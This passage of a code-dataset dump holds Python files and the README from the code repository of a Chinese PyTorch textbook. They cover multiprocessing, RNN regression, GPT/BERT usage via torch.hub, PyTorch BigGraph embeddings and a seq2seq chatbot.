num_epochs=10,\n #学习率\n lr=0.001,\n # Misc\n hogwild_delay=2,\n )\n\n return config" }, { "alpha_fraction": 0.5962733030319214, "alphanum_fraction": 0.6024844646453857, "avg_line_length": 22.88888931274414, "blob_id": "4c4f459dc84b511b9664e65fdbae96682c328aed", "content_id": "cbac214e34fda13fa5778634cbdf33ec19982971", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 794, "license_type": "no_license", "max_line_length": 69, "num_lines": 27, "path": "/chapter3/多进程.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch.multiprocessing as mp\nimport os\ndef foo(q): #传递队列对象给函数\n pid = os.getpid()\n q.put('my pid is:{}'.format(pid))\n print(pid)\n\nif __name__ == '__main__':\n #设置启动进程方式,windows下默认为spawn,linux下为fork\n mp.set_start_method('spawn') \n #创建队列对象\n q = mp.Queue() \n ps = []\n #创建10个进程,传递运行函数和参数\n [ps.append(mp.Process(target=foo, args=(q,))) for i in range(10)]\n #启动进程\n [p.start() for p in ps]\n #join方法让主线程阻塞,等待子线程执行完成再执行\n [p.join() for p in ps]\n #获取队列数据\n data = q.get()\n while(data):\n print(data)\n data = q.get()" }, { "alpha_fraction": 0.3604843020439148, "alphanum_fraction": 0.5839295387268066, "avg_line_length": 21.331966400146484, "blob_id": "732a63d001a2fabc392c0c4e1201f1da6ce9e74c", "content_id": "7291d22d9d76136f61d238c833526b89bc5b5e9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7912, "license_type": "no_license", "max_line_length": 47, "num_lines": 244, "path": "/README.md", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "### Learn-Pytorch-And-Become-A-Data-Scientist\n### 《学好Pytorch成为数据科学家》书籍代码\n### 请扫描关注,图书微信公众号。\n![avatar](gongzhonghao.jpg)\n### 图书目录\n```\n第1章 初识Pytorch\t11\n```\n- 1.1 AI发展简史\t12\n - 1.1.1 神经网络的前世今生\t12\n - 1.1.2 深度学习框架对比\t13\n- 1.2 环境安装\t16\n - 1.2.1 Python版本选择及安装\t16\n - 1.2.2 安装Pytorch1.2稳定版\t18\n - 1.2.3 开发环境IDE\t19\n- 1.3 Pytorch核心概念\t20\n - 1.3.1基本概念\t20\n - 1.3.2自动微分\t24\n - 1.3.3 Pytorch核心模块\t26\n- 1.4 实验室小试牛刀\t27\n - 1.4.1塔珀自指公式\t27\n - 1.4.2看看你毕业了能拿多少\t28\n- 1.5 课后加油站高等数学知识回顾\t43\n - 1.5.1 函数与导数\t43\n - 1.5.2 偏导数及梯度\t47\n```\n第2章 机器学习基础及常见概念\t50\n```\n- 2.1 机器学习的分类\t51\n - 2.1.1 监督学习\t51\n - 2.1.2 半监督学习\t52\n - 2.1.3 无监督学习\t52\n - 2.1.4 强化学习\t53\n- 2.2 机器学习常见概念\t54\n - 2.2.1 缺失值处理\t54\n - 2.2.2 数据标准化与正则化\t56\n - 2.2.3 交叉验证\t58\n - 2.2.4 过拟合和欠拟合\t60\n- 2.3 神经网络\t61\n - 2.3.1 神经网络的生理学发现与编程模拟\t61\n - 2.3.2 人工神经网络的核心思想\t67\n - 2.3.3 人工神经网络与逻辑斯蒂之间的关联\t68\n- 2.4实现线性回归和逻辑回归\t68\n - 2.4.1 Pytorch实现线性回归\t68\n - 2.4.2 Pytorch实现多项式回归\t70\n - 2.4.3 Pytorch实现类逻辑回归\t73\n- 2.5 加油站高等数学知识回顾\t77\n - 2.5.1 方向导数和梯度\t77\n - 2.5.2 微分及积分\t79\n - 2.5.3 牛顿-莱布尼兹公式\t82\n```\n第3章 Pytorch与科学计算\t83\n```\n- 3.1 算子字典\t83\n - 3.1.1 基本方法\t83\n - 3.1.2 索引·切片·连接·换位\t85\n - 3.1.3 随机抽样\t89\n - 3.1.4 数据持久化与高并发\t90\n - 3.1.5 元素级别数学计算\t91\n - 3.1.6 规约计算\t94\n - 3.1.7 数值比较运算\t96\n - 3.1.8 矩阵运算\t98\n- 3.2 广播机制\t101\n - 3.2.1 自动广播规则\t101\n - 3.2.2 广播结果结算规则\t102\n- 3.3 GPU及并行编程\t103\n - 3.3.1 device和cuda基本用法\t103\n - 3.3.2 CPU到GPU\t104\n - 3.3.3 固定缓冲区\t106\n - 3.3.4 自动设备感知\t107\n - 3.3.5 并发编程\t108\n- 3.4 实验室小试牛刀之轻松搞定图片分类\t110\n - 3.4.1 Softmax分类简介\t113\n - 3.4.2 定义网络结构\t115\n- 3.5 加油站高等数学知识回顾\t120\n - 3.5.1 泰勒公式及思想\t121\n - 3.5.2 拉格朗日乘子法及思想\t124\n```\n第4章 激活函数、损失函数、优化器及数据加载\t125\n``` \n- 4.1 激活函数\t126\n - 4.1.1 Sigmoid\t126\n - 4.1.2 Tanh\t128\n - 4.1.3 Relu及其变形\t129\n - 4.1.4 MaxOut\t132\n- 4.2 损失函数\t133\n - 4.2.1 L1范数损失\t134\n - 4.2.2 MSE均方误差损失\t134\n - 4.2.3 BCE二分类交叉熵损失\t135 \n - 4.2.4 CrossEntropyLoss和NLLLoss计算交叉熵损失\t135\n - 4.2.5 KL散度损失\t136\n - 4.2.6 余弦相似度损失\t137\n - 4.2.7 多分类多标签损失\t138\n- 4.3 优化器\t139\n - 4.3.1 BGD\t139\n - 4.3.2 SGD\t139\n - 4.3.3 MBGD\t140\n - 4.3.4 Momentum\t141\n - 4.3.5 NAG\t142\n - 4.3.6 Adagrad\t143\n - 4.3.7 Adadelta\t143\n - 4.3.8 Adam\t144\n- 4.4 数据加载\t145\n - 4.4.1 Dataset数据集\t145\n - 4.4.2 DataLoader数据加载\t148\n- 4.5 初探卷积神经网络\t149\n - 4.5.1 知识科普:卷积过程及物理意义\t149\n - 4.5.2 卷积神经网络CNN\t153\n - 4.5.3 stride和padding\t158\n - 4.5.4 膨胀卷积神经网络\t159\n - 4.5.5 Pooling池化\t161\n- 4.6 实验室小试牛刀\t164\n - 4.6.1 设计卷积神经网络\t164\n - 4.6.2 定义卷积网络\t164\n - 4.6.3 训练模型\t165\n - 4.6.4 理解CNN在学什么\t168\n```\n第5章 Pytorch深度神经网络\t177\n```\n- 5.1 计算机视觉工具包\t177\n- 5.2 训练过程的可视化\t179\n - 5.2.1 Tensorboard\t179\n - 5.2.2 Visdom\t184\n- 5.3 深度神经网络\t186\n - 5.3.1 LeNet\t187 \n - 5.3.2 AlexNet\t188\n - 5.3.3 ZF-Net\t190\n - 5.3.4 VGG-Nets\t191\n - 5.3.5 GoogLeNet\t194\n - 5.3.6 ResNet\t196\n - 5.3.7 DenseNet\t197\n- 5.4 RNN循环神经网络\t199\n - 5.4.1 RNN\t199\n - 5.4.2 LSTM\t203\n - 5.4.3 GRU\t207\n- 5.5 实验室小试牛刀\t209\n - 5.5.1 数据准备\t209\n - 5.5.2 GRU网络设计\t211\n - 5.5.3 训练模型\t212\n - 5.5.4 模型预测\t213\n- 5.6 加油站之概率论基础知识回顾\t214\n - 5.6.1 离散型随机变量和连续型随机变量\t214\n - 5.6.2 概率论常用概念\t219\n - 5.6.3 二维随机变量\t220\n - 5.6.4 边缘分布\t223\n - 5.6.5 期望和方差\t224\n - 5.6.6 大数定理\t225\n - 5.6.7 马尔科夫不等式及切比雪夫不等式\t226\n - 5.6.8 中心极限定理\t227\n```\n第6章 自然语言处理\t227\n```\n- 6.1 自然语言基础\t227\n - 6.1.1 自然语言发展史\t228\n - 6.1.2 自然语言处理中的常见任务\t230\n - 6.1.3 统计自然语言理论\t232\n - 6.1.4 隐马尔可夫模型实现中文分词\t240\n- 6.2 关键字提取\t242\n - 6.2.1 TF-IDF\t243\n - 6.2.2 TextRank\t244\n - 6.2.3 主题模型\t245\n- 6.3 Word2vec和词嵌入\t246\n - 6.3.1 N-Gram模型\t246\n - 6.3.2 词袋模型\t247\n - 6.3.3 Word2vec词向量的密集表示\t248\n - 6.3.4 使用Word2vec生成词向量\t255\n - 6.3.5 Word2vec源码调试\t256\n - 6.3.6 Pytorch中使用词向量\t256\n- 6.4 变长序列处理\t258\n - 6.4.1 pack_padded_sequence压缩\t259\n - 6.4.2 pad_packed_sequence解压缩\t261\n- 6.5 Encoder-Decoder框架和注意力机制\t262\n - 6.5.1 Encoder-Decoder框架\t262\n - 6.5.2 Attention Mechanism注意力机制\t263\n- 6.6 实验室小试牛刀对话机器人\t266\n - 6.6.1 中文对话语料\t266\n - 6.6.2 构建问答词典\t267\n - 6.6.3 DataLoader数据加载\t268\n - 6.6.4 Encoder双向多层GRU\t271\n - 6.6.5 Attention注意力机制\t272\n - 6.6.6 Decoder多层GRU\t273\n - 6.6.7 模型训练\t274\n - 6.6.8 答案搜索及效果展示\t276\n- 6.7 加油站之常见的几种概率分布\t277\n - 6.7.1 二项分布\t277\n - 6.7.2 正态分布\t278\n - 6.7.3 均匀分布\t279\n - 6.7.4 泊松分布\t280\n - 6.7.5 卡方分布\t282\n - 6.7.6 Beta分布\t283\n```\n第7章 自然语言的曙光预训练模型\t284\n```\n- 7.1 预训练模型的应用\t285\n- 7.2 从Word Embedding到ELMO\t286\n - 7.2.1 Word Embedding头上的乌云\t286\n - 7.2.2 ELMO\t286\n- 7.3 从ELMO到GPT\t288\n - 7.3.1 GPT模型\t288\n - 7.3.2 使用GPT模型\t289\n- 7.4 从GPT到BERT\t291\n```\n第8章 自然语言处理利器AllenNLP\t295\n```\n- 8.1 中文词性标注\t295\n - 8.1.1 DatasetReader数据读取\t295\n - 8.1.2 定义Model模型\t297\n - 8.1.3 训练模型\t298\n - 8.1.4 模型预测\t300\n - 8.1.5 保存和加载模型\t300\n- 8.2 AllenNLP 使用Config Files\t301\n - 8.2.1 参数解析\t301\n - 8.2.2 注册数据读取器和模型\t301\n - 8.2.3 定义Jsonnet配置文件\t302\n - 8.2.4 命令行工具\t303\n - 8.2.5 特征融合\t304\n - 8.2.6 制作在线Demo\t306\n```\n第9章 FastAI高层深度学习框架\t307\n```\n- 9.1 FastAI框架中的原语\t307\n- 9.2 FastAI框架中使用BERT完成中文分类\t308\n - 9.2.1 分词器\t308\n - 9.2.2 定义字典\t309\n - 9.2.3 数据准备\t310\n - 9.2.4 构建Databunch和Learner\t311\n - 9.2.5 开始训练\t312\n - 9.2.6 模型保存和加载\t313\n - 9.2.7 模型预测\t313\n - 9.2.8 制作Rest接口提供服务\t313\n```\n第10章 Pytorch Big Graph大型图嵌入\t314\n```\n- 10.1 Pytorch Big Graph简介\t315\n - 10.1.1 PBG模型\t315\n - 10.1.2 模型的表示\t316\n - 10.1.3 正负样本及损失函数\t317\n - 10.1.4 分布式训练\t317\n - 10.1.5 批量负采样\t318\n- 10.2 PBG实践应用\t319\n - 10.2.1 模型配置文件\t320\n - 10.2.2 划分训练集和测试集\t321\n - 10.2.3 模型训练和验证\t322\n - 10.2.4 图嵌入向量及应用\t323\n\n\n" }, { "alpha_fraction": 0.5803108811378479, "alphanum_fraction": 0.6044905185699463, "avg_line_length": 31.22222137451172, "blob_id": "933ad1fc78ab6f661b41ad8adcb1b7f883a19868", "content_id": "6c6b2ef7453a9e044167e3ce01010ef62f607cff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 587, "license_type": "no_license", "max_line_length": 98, "num_lines": 18, "path": "/chapter3/multiprocess/train.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import os\nimport torch\nimport torch.optim as optim\n\ndef train(x_train,y_train,model):\n criterion = torch.nn.MSELoss()\n optimizer = torch.optim.SGD(model.parameters(),0.001) \n #开始训练\n num_epochs = 100000\n for i in range(num_epochs):\n input_data = x_train.unsqueeze(1)\n target = y_train.unsqueeze(1)\n out = model(input_data)\n loss = criterion(out,target)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(\"PID:{},Epoch:[{}/{}],loss:[{:.4f}]\".format(os.getpid(),i+1,num_epochs,loss.item()))" }, { "alpha_fraction": 0.7343412637710571, "alphanum_fraction": 0.7386609315872192, "avg_line_length": 30.931034088134766, "blob_id": "c52d8c19704f2b0a289d50a2a71e346aae38ae71", "content_id": "85adda2758e06cba7fd58158036ff00d0f0e109a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1018, "license_type": "no_license", "max_line_length": 102, "num_lines": 29, "path": "/chapter7/gpt.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "### First, tokenize the input\n#############################\nimport torch\ntokenizer = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'openAIGPTTokenizer', 'openai-gpt')\n\ntext = \"I Love \"\ntokenized_text = tokenizer.tokenize(text)\nindexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)\ntokens_tensor = torch.tensor([indexed_tokens])\n\n\n#使用openAIGPTModel模型计算隐状态\nmodel = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'openAIGPTModel', 'openai-gpt')\n#转换为测试模式\nmodel.eval()\n#计算隐状态\nwith torch.no_grad():\n\thidden_states = model(tokens_tensor)\n\n\n#使用openAIGPTLMHeadModel模型对下一个词进行预测\nlm_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'openAIGPTLMHeadModel', 'openai-gpt')\nlm_model.eval()\n#得到预测值\nwith torch.no_grad():\n\tpredictions = lm_model(tokens_tensor)\n#取出最可能的词\npredicted_index = torch.argmax(predictions[0][0, -1, :]).item()\npredicted_token = tokenizer.convert_ids_to_tokens([predicted_index])[0]\n" }, { "alpha_fraction": 0.6507495641708374, "alphanum_fraction": 0.6907273530960083, "avg_line_length": 34.313724517822266, "blob_id": "dc8c057a56fcf27660500b7f9988256423cacdf3", "content_id": "a489f8d4eab1fa122a53ca358f636034b3d26b58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1873, "license_type": "no_license", "max_line_length": 74, "num_lines": 51, "path": "/chapter10/PBG/app.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import json\nimport h5py\nimport os\n\nDATA_DIR = \"datas/soc-LiveJournal\"\n#加载生成的实体字典\nwith open(os.path.join(DATA_DIR,\"dictionary.json\"), \"rt\") as tf:\n dictionary = json.load(tf)\n#查找用户\"1\"在字典中的索引\nuser_id = \"0\"\noffset = dictionary[\"entities\"][\"user_id\"].index(user_id)\nprint(\"用户{}在字典中的索引为{}\".format(user_id, offset))\n\n#加载嵌入文件\nwith h5py.File(\"model/demo/embeddings_user_id_1.v10.h5\", \"r\") as hf:\n embedding_user_0 = hf[\"embeddings\"][offset, :]\n embedding_all = hf[\"embeddings\"][:]\n\nprint(embedding_user_0.shape)\nprint(embedding_all.shape)\n\nfrom torchbiggraph.model import DotComparator\nsrc_entity_offset = dictionary[\"entities\"][\"user_id\"].index(\"0\")\ndest_1_entity_offset = dictionary[\"entities\"][\"user_id\"].index(\"7\")\ndest_2_entity_offset = dictionary[\"entities\"][\"user_id\"].index(\"135\")\n\nwith h5py.File(\"model/demo/embeddings_user_id_0.v10.h5\", \"r\") as hf:\n src_embedding = hf[\"embeddings\"][src_entity_offset, :]\n dest_1_embedding = hf[\"embeddings\"][dest_1_entity_offset, :]\n dest_2_embedding = hf[\"embeddings\"][dest_2_entity_offset, :]\n dest_embeddings = hf[\"embeddings\"][...]\n\nimport torch\ncomparator = DotComparator()\n\nscores_1, _, _ = comparator(\n comparator.prepare(torch.tensor(src_embedding.reshape([1,1,520]))),\n comparator.prepare(torch.tensor(dest_1_embedding.reshape([1,1,520]))),\n torch.empty(1, 0, 520), # Left-hand side negatives, not needed\n torch.empty(1, 0, 520), # Right-hand side negatives, not needed\n)\n\nscores_2, _, _ = comparator(\n comparator.prepare(torch.tensor(src_embedding.reshape([1,1,520]))),\n comparator.prepare(torch.tensor(dest_2_embedding.reshape([1,1,520]))),\n torch.empty(1, 0, 520), # Left-hand side negatives, not needed\n torch.empty(1, 0, 520), # Right-hand side negatives, not needed\n)\n\nprint(scores_1)\nprint(scores_2)\n" }, { "alpha_fraction": 0.6195579171180725, "alphanum_fraction": 0.6255860924720764, "avg_line_length": 41.68571472167969, "blob_id": "67104e161115e4cd9a42167a294877565c96c773", "content_id": "0939bdcfd6ce2682f68cef677860f4061b1e9ff1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1649, "license_type": "no_license", "max_line_length": 105, "num_lines": 35, "path": "/chapter6/robot/search.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\n\n\n\nclass GreedySearchDecoder(nn.Module):\n def __init__(self, encoder, decoder):\n super(GreedySearchDecoder, self).__init__()\n self.encoder = encoder\n self.decoder = decoder\n\n def forward(self, sos, eos, input_seq, input_length, max_length, device):\n # Encoder的Forward计算 \n encoder_outputs, encoder_hidden = self.encoder(input_seq, input_length)\n # 把Encoder最后时刻的隐状态作为Decoder的初始值\n decoder_hidden = encoder_hidden[:self.decoder.num_layers]\n # Decoder的初始输入是SOS\n decoder_input = torch.ones(1, 1, device=device, dtype=torch.long) * sos\n all_tokens = torch.zeros([0], device=device, dtype=torch.long)\n all_scores = torch.zeros([0], device=device)\n # 搜索,直到遇到EOS结束符或者达到最大解码长度\n for _ in range(max_length):\n # 单步执行Decoder Forward\n #decodr shape:(batch,vob_size)=(1,vob_size)\n decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs)\n # 返回概率最大的词的概率和得分\n decoder_scores, decoder_input = torch.max(decoder_output, dim=1)\n all_tokens = torch.cat((all_tokens, decoder_input), dim=0)\n all_scores = torch.cat((all_scores, decoder_scores), dim=0)\n # 用unsqueeze增加batch维度。\n if decoder_input.item() == eos:\n break\n decoder_input = torch.unsqueeze(decoder_input, 0)\n # 返回所有的词和得分。\n return all_tokens, all_scores" }, { "alpha_fraction": 0.73221755027771, "alphanum_fraction": 0.7428387403488159, "avg_line_length": 42.760562896728516, "blob_id": "1852c1abb7745b1808b87c83f38e49ec923dfa86", "content_id": "f4ec9558beec48d338c51fa788dd6eb02509f6ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3179, "license_type": "no_license", "max_line_length": 128, "num_lines": 71, "path": "/chapter7/bert.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "\nimport torch\n#下载BERT分词器\ntokenizer = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertTokenizer', 'bert-base-chinese', do_basic_tokenize=False)\n#构建输入\ntext = \"[CLS]北京天安门。[SEP]四川成都。[SEP]\"\ntokenized_text = tokenizer.tokenize(text)\nindexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)\n\n### Get the hidden states computed by `bertModel`\n# Define sentence A and B indices associated to 1st and 2nd sentences (see paper)\nsegments_ids = [0, 0, 0, 0, 0, 0,0,0,1, 1, 1, 1, 1, 1]\n\n# Convert inputs to PyTorch tensors\nsegments_tensors = torch.tensor([segments_ids])\ntokens_tensor = torch.tensor([indexed_tokens])\n\nmodel = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertModel', 'bert-base-chinese')\nmodel.eval()\n\nwith torch.no_grad():\n encoded_layers, _ = model(tokens_tensor, segments_tensors)\n\n\n ### Predict masked tokens using `bertForMaskedLM`\n # Mask a token that we will try to predict back with `BertForMaskedLM`\n masked_index = 12\n tokenized_text[masked_index] = '[MASK]'\n indexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)\n tokens_tensor = torch.tensor([indexed_tokens])\n \n maskedLM_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertForMaskedLM', 'bert-base-chinese')\n maskedLM_model.eval()\n \n with torch.no_grad():\n predictions = maskedLM_model(tokens_tensor, segments_tensors)\n \n # Get the predicted token\n predicted_index = torch.argmax(predictions[0][0, masked_index]).item()\n predicted_token = tokenizer.convert_ids_to_tokens([predicted_index])[0]\n #assert predicted_token == 'Jim'\n\n### Classify next sentence using ``bertForNextSentencePrediction``\n# Going back to our initial input\n#text = \"[CLS]四川的省会是? [SEP]成都[SEP]\"\ntext = \"[CLS]四川的省会是? [SEP]滚蛋[SEP]\"\ntokenized_text = tokenizer.tokenize(text)\nindexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)\ntokens_tensor = torch.tensor([indexed_tokens])\nsegments_ids = [0, 0, 0, 0, 0, 0,0,0,0,1, 1, 1]\n# Convert inputs to PyTorch tensors\nsegments_tensors = torch.tensor([segments_ids])\nnextSent_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertForNextSentencePrediction', 'bert-base-chinese')\nnextSent_model.eval()\n\n# Predict the next sentence classification logits\nwith torch.no_grad():\n next_sent_classif_logits = nextSent_model(tokens_tensor, segments_tensors)\n\n### Fine-tune BERT using `bertForPreTraining`\ntokens_tensor = torch.tensor([indexed_tokens])\nsegments_tensors = torch.tensor([segments_ids])\n\nforPretraining_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertForPreTraining', 'bert-base-cased')\nmasked_lm_logits_scores, seq_relationship_logits = forPretraining_model(tokens_tensor, segments_tensors)\n\n### Fine-tune BERT using `bertForPreTraining`\ntokens_tensor = torch.tensor([indexed_tokens])\nsegments_tensors = torch.tensor([segments_ids])\n#large case\nforPretraining_model = torch.hub.load('huggingface/pytorch-pretrained-BERT', 'bertForPreTraining', 'bert-large-cased')\nmasked_lm_logits_scores, seq_relationship_logits = forPretraining_model(tokens_tensor, segments_tensors)" }, { "alpha_fraction": 0.5960590839385986, "alphanum_fraction": 0.6147783398628235, "avg_line_length": 31.75806427001953, "blob_id": "d8049053e252d84f7beb0a18ac485ce2e5b62cee", "content_id": "f75e91b57a2dfb9d75015a715c59c0d977431601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2204, "license_type": "no_license", "max_line_length": 108, "num_lines": 62, "path": "/chapter5/RNN/RNNRegression.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\nfrom torch import nn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nbins = 50 # RNN时间步长\ninput_dim = 1 # RNN输入尺寸\nlr = 0.01 # 初始学习率\nepochs = 2000 # 轮数\nhidden_size=32 # 隐藏层神经元个数\nnum_layers = 2 # 神经元层数\nnonlinearity=\"relu\" #只支持relu和tanh\n\nclass RNNDemo(nn.Module):\n def __init__(self,input_dim,hidden_size,num_layers,nonlinearity):\n super().__init__()\n self.input_dim = input_dim\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.nonlinearity = nonlinearity\n self.rnn = nn.RNN(\n input_size=input_dim,\n hidden_size=hidden_size,\n num_layers=num_layers,\n nonlinearity=nonlinearity\n )\n self.out = nn.Linear(hidden_size, 1)\n\n def forward(self, x, h):\n r_out, h_state = self.rnn(x,h)\n outs = [] \n for time_step in range(r_out.size(1)):\n outs.append(self.out(r_out[:, time_step, :]))\n return torch.stack(outs, dim=1), h_state\n\n\n\nrnnDemo = RNNDemo(input_dim,hidden_size,num_layers,nonlinearity).cuda()\noptimizer = torch.optim.Adam(rnnDemo.parameters(), lr=lr)\nloss_func = nn.MSELoss()\n\nh_state = None\nfor step in range(epochs):\n start, end = step * np.pi, (step + 1) * np.pi # 时间跨度\n # 使用Sin函数预测Cos函数\n steps = np.linspace(start, end, bins, dtype=np.float32, endpoint=False)\n x_np = np.sin(steps)\n y_np = np.cos(steps)\n x = torch.from_numpy(x_np).unsqueeze(1).unsqueeze(2).cuda()#【100,1,1】尺寸大小为(time_step, batch, input_size)\n y = torch.from_numpy(y_np).unsqueeze(1).unsqueeze(2).cuda()#【100,1,1】\n prediction, h_state = rnnDemo(x, h_state) # RNN输出(预测结果,隐藏状态)\n #将每一次输出的中间状态传递下去(不带梯度)\n h_state = h_state.detach() \n loss = loss_func(prediction, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if(step%100==0):\n print(\"loss:{:.8f}\".format(loss))\nplt.scatter(steps,y_np,marker=\"^\")\nplt.scatter(steps, prediction.cpu().data.numpy().flatten(),marker=\".\")\nplt.show()" }, { "alpha_fraction": 0.7019762992858887, "alphanum_fraction": 0.7035573124885559, "avg_line_length": 27.772727966308594, "blob_id": "0f0d8aa93a6cb74494018b628ed21ef505a83b3e", "content_id": "12de450ee8c1db99849594823e41a9fdb1b3a7c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1455, "license_type": "no_license", "max_line_length": 79, "num_lines": 44, "path": "/chapter10/PBG/train_and_test.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import os\nimport attr\n\nfrom torchbiggraph.converters.import_from_tsv import convert_input_data\nfrom torchbiggraph.config import parse_config\nfrom torchbiggraph.train import train\nfrom torchbiggraph.eval import do_eval\n\n\nDATA_DIR = \"datas/soc-LiveJournal\"\nCONFIG_PATH = \"config.py\"\nFILENAMES = {\n 'train': 'train.txt',\n 'test': 'test.txt',\n}\n\ndef convert_path(fname):\n \"\"\"\n 辅助方法,用于将真实文件绝对路径文件名后缀使用_partitioned替换\n \"\"\"\n basename, _ = os.path.splitext(fname)\n out_dir = basename + '_partitioned'\n return out_dir\n\nedge_paths = [os.path.join(DATA_DIR, name) for name in FILENAMES.values()]\ntrain_paths = [convert_path(os.path.join(DATA_DIR, FILENAMES['train']))]\neval_paths = [convert_path(os.path.join(DATA_DIR, FILENAMES['test']))]\n\ndef run_train_eval():\n #将数据转为PBG可读的分区文件\n convert_input_data(CONFIG_PATH,edge_paths,lhs_col=0,rhs_col=1,rel_col=None)\n #解析配置\n config = parse_config(CONFIG_PATH)\n #训练配置,已分区的train_paths路径替换配置文件中的edge_paths\n train_config = attr.evolve(config, edge_paths=train_paths)\n #传入训练配置文件开始训练\n train(train_config)\n #测试配置,已分区的eval_paths路径替换配置文件中的edge_paths\n eval_config = attr.evolve(config, edge_paths=eval_paths)\n #开始验证\n do_eval(eval_config)\n\nif __name__ == \"__main__\":\n run_train_eval()" }, { "alpha_fraction": 0.5821917653083801, "alphanum_fraction": 0.6164383292198181, "avg_line_length": 23.851064682006836, "blob_id": "fbba25d29e64ad34dae814ac25bb93b8312bd93a", "content_id": "210ec0819bacb58b55c6b06fff18455fd601711f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1424, "license_type": "no_license", "max_line_length": 57, "num_lines": 47, "path": "/chapter6/robot/config.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import torch\n\nclass Config:\n '''\n Chatbot模型参数\n '''\n corpus_data_path = './QNS_corpus.pth' #已处理的对话数据\n use_QA_first = True #是否载入知识库\n max_input_length = 30 #输入的最大句子长度\n max_generate_length = 30 #生成的最大句子长度\n prefix = 'checkpoints/chatbot' #模型断点路径前缀\n model_ckpt = 'checkpoints/chatbot_0630_1610' #加载模型路径\n '''\n 训练超参数\n '''\n batch_size = 128\n shuffle = True #dataloader是否打乱数据\n num_workers = 0 #dataloader多进程提取数据\n bidirectional = True #Encoder-RNN是否双向\n hidden_size = 128\n embedding_dim = 300\n method = 'dot' #attention method\n dropout = 0.0 #是否使用dropout\n clip = 50.0 #梯度裁剪阈值\n num_layers = 2 #Encoder-RNN层数\n learning_rate = 1e-3\n #teacher_forcing比例\n teacher_forcing_ratio = 1.0 \n decoder_learning_ratio = 1.0\n drop_last = True\n '''\n 训练周期信息\n '''\n epoch = 200\n print_every = 1 #每多少步打印一次\n save_every = 10 #没迭代多少Epoch保存一次模型\n '''\n GPU#是否使用gpu\n '''\n use_gpu = torch.cuda.is_available() \n #使用GPU或CPU\n device = torch.device(\"cuda\" if use_gpu else \"cpu\")\n #是否使用固定缓冲区\n pin_memory = True if(use_gpu) else False\n\nif __name__==\"__main__\":\n print(Config.pin_memory)\n" }, { "alpha_fraction": 0.5908860564231873, "alphanum_fraction": 0.6050633192062378, "avg_line_length": 28.477611541748047, "blob_id": "04f6a2be2f3430f02e2f98d4ae184f83a36d41d5", "content_id": "6aef3241393fec8161a7dbd7a14f6677f20f0874", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2263, "license_type": "no_license", "max_line_length": 120, "num_lines": 67, "path": "/chapter6/robot/data_prepare.py", "repo_name": "Andr3wis2Cool4School/Learn-Pytorch-And-Become-A-Data-Scientist", "src_encoding": "UTF-8", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import pack_padded_sequence,pad_packed_sequence\nimport jieba\nimport re\n\n#未录入字符替换符\nunknown = '</UNK>' \n#句子结束符\neos = '</EOS>' \n#句子开始符\nsos = '</SOS>' \n#句子填充符\npadding = '</PAD>' \n#字典最大长度\nmax_voc_length = 50000 \n#加入字典的词的词频最小值\nmin_freq = 1\n#最大句子长度\nmax_sentence_length = 50 \n#已处理的对话数据集保存路径\nsave_path = 'QNS_corpus.pth' \n#中文英文处理正则\nreg = re.compile(\"[^\\u4e00-\\u9fa5^a-z^A-Z^0-9]\")\n\ndef datapreparation():\n '''处理对话数据集'''\n data = []\n lines = np.load(\"./datas/CN-corpus.npy\")\n for line in lines:\n values = line.split('|')\n sentences = []\n for value in 